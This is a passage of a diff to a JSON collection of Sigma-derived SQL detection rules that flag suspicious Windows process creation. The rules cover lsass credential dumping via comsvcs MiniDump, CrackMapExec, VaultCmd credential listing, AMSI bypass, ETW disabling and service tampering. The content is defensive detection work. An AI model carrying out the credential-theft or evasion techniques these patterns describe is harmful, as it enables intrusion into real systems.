"9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", - "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Persistence Attempt Via Existing Service Tampering", - "id": "38879043-7e1e-47a9-8d46-6bec88e201df", - "status": "test", - "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", - "author": "Sreeman", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "status": "experimental", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003", "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "Windows Credential Manager Access via VaultCmd", - "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "status": "experimental", - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_vaultcmd_list_creds.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", - "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "status": "experimental", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate administration activity" + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_mssql_susp_child_process.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", + "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "status": "experimental", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", + "description": "Detects the execution of a renamed version of the Plink binary", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Query Usage To Exfil Data", + "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "status": "experimental", + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.execution" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_query_session_exfil.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost Spawned By Uncommon Parent Process", + "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "status": "experimental", + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", + "author": "Tim Rauch", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE 